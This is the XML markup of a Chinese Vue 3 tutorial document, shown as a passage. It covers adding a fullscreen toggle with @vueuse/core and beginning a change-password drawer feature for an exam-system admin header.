    <w:p w14:paraId="43A6F57A" w14:textId="0C76494F" w:rsidR="000215E6" w:rsidRDefault="000215E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然之前我们安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vueuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的包，但是现在我们需要安装他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C68177" w14:textId="0E40D198" w:rsidR="00A92AAA" w:rsidRPr="000B2487" w:rsidRDefault="000215E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm i @vueuse/core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE3B2A" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379082B7" w14:textId="58888BC6" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vueuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的全屏方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB65A5" w14:textId="54017907" w:rsidR="000B2487" w:rsidRPr="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useFullscreen } from '@vueuse/core'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF372C2" w14:textId="79776047" w:rsidR="000B2487" w:rsidRPr="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const { isFullscreen, enter, exit, toggle } = useFullscreen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8652DF" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F25F90D" w14:textId="47D4DD21" w:rsidR="000B2487" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FHeader</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760000D" w14:textId="77777777" w:rsidR="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6740C3FF" w14:textId="77777777" w:rsidR="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-icon class="icon-btn" </w:t>
      </w:r>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@click="toggle"</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABF0C4" w14:textId="77777777" w:rsidR="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;FullScreen /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED01881" w14:textId="714074F4" w:rsidR="000B2487" w:rsidRPr="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048C9DA" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6B2685" w14:textId="77777777" w:rsidR="00E311C1" w:rsidRPr="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全屏，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">isFullscreen </w:t>
      </w:r>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是否全屏，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">toggle </w:t>
      </w:r>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>切换全屏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB18140" w14:textId="77777777" w:rsidR="00E311C1" w:rsidRPr="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useFullscreen } from '@vueuse/core'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6374AADA" w14:textId="37B85249" w:rsidR="000B2487" w:rsidRPr="00E311C1" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E311C1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const { isFullscreen, toggle } = useFullscreen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB544D" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0D3557" w14:textId="1A5E41DE" w:rsidR="00E311C1" w:rsidRPr="00181907" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来修改全屏状态下，这个图标是缩小屏幕的一个图标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DBF0D" w14:textId="34CBD89B" w:rsidR="000B2487" w:rsidRDefault="00E311C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B417F7D" wp14:editId="6EAA5C92">
            <wp:extent cx="5274310" cy="2080895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2051947925"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47925" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2080895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29472E97" w14:textId="77777777" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD31AAB" w14:textId="47A4473A" w:rsidR="000B2487" w:rsidRDefault="00F42B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码复制过来，然后此处需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v-if v-else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断是否全屏，来进行切换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06815AB8" w14:textId="77777777" w:rsidR="00F42B04" w:rsidRPr="00F42B04" w:rsidRDefault="00F42B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42B04">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42B04">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-icon class="icon-btn" @click="toggle"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B820522" w14:textId="77777777" w:rsidR="00F42B04" w:rsidRPr="00F42B04" w:rsidRDefault="00F42B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42B04">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;FullScreen v-if="!isFullscreen"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360BBD59" w14:textId="77777777" w:rsidR="00F42B04" w:rsidRPr="00F42B04" w:rsidRDefault="00F42B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42B04">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;Aim v-else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2D45B" w14:textId="7B6BCA8F" w:rsidR="000B2487" w:rsidRPr="00F42B04" w:rsidRDefault="00F42B04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42B04">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8996C8" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6A2389" w14:textId="675A296B" w:rsidR="000B2487" w:rsidRDefault="00926526" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="706" w:name="_Toc159780136"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="706"/>
    </w:p>
    <w:p w14:paraId="11E23768" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E745531" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF50C6C" w14:textId="5E5E9A5C" w:rsidR="000B2487" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涉及修改密码功能，肯定涉及修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08B057" w14:textId="3F336150" w:rsidR="00B44D93" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE031C7" w14:textId="391F7ACC" w:rsidR="00B44D93" w:rsidRPr="00181907" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B44D93">
        <w:t>https://dishaxy.dishait.cn/shopadminapi/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA59FC" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F9C06D" w14:textId="41DF238B" w:rsidR="00B44D93" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578AEEB7" w14:textId="0C081638" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B44D93">
        <w:t>http://ceshi13.dishait.cn/admin/updatepassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4B7FA" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5242AEF6" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633EF599" w14:textId="2CE62F58" w:rsidR="000B2487" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:t>/manager.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0160CD72" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B6403D" w14:textId="1CC61CCA" w:rsidR="000B2487" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增修改密码的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16353FAE" w14:textId="77777777" w:rsidR="00B44D93" w:rsidRPr="00B44D93" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44D93">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export function updatePassword(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8B468" w14:textId="77777777" w:rsidR="00B44D93" w:rsidRPr="00B44D93" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44D93">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return axios.post('/admin/updatepassword', data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB5C58" w14:textId="7B8DA41D" w:rsidR="000B2487" w:rsidRPr="00B44D93" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44D93">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A28ED6" w14:textId="77777777" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524E6CAD" w14:textId="1E176918" w:rsidR="000B2487" w:rsidRDefault="00B44D93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为修改密码我们希望从右侧往左侧进行弹窗，因此去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抽屉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390E45E" w14:textId="4E4D2BF1" w:rsidR="000B2487" w:rsidRDefault="00FD5614" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD5614">
        <w:t>https://element-plus.org/zh-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5614">
        <w:lastRenderedPageBreak/>
        <w:t>CN/component/drawer.html#%E4%B8%8D%E6%B7%BB%E5%8A%A0-title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895C2EF" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24645465" w14:textId="16F7CED5" w:rsidR="000B2487" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>layouts</w:t>
      </w:r>
      <w:r>
        <w:t>/components/FHeader.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB7AC9" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689755DD" w14:textId="34D6A5A2" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码完成的部分如下：基本将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的表单处理复制过来，然后该执行什么动作就执行什么动作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE3534" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225E5456" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D62908" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div class="f-header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0DDD1" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;span class="logo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A6075" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="mr-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD357EC" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;ElemeFilled /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE0D679" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F909C5A" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAEB9B" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD7B04" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58251CE5" w14:textId="77777777" w:rsidR="00D43B70" w:rsidRDefault="00D43B70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
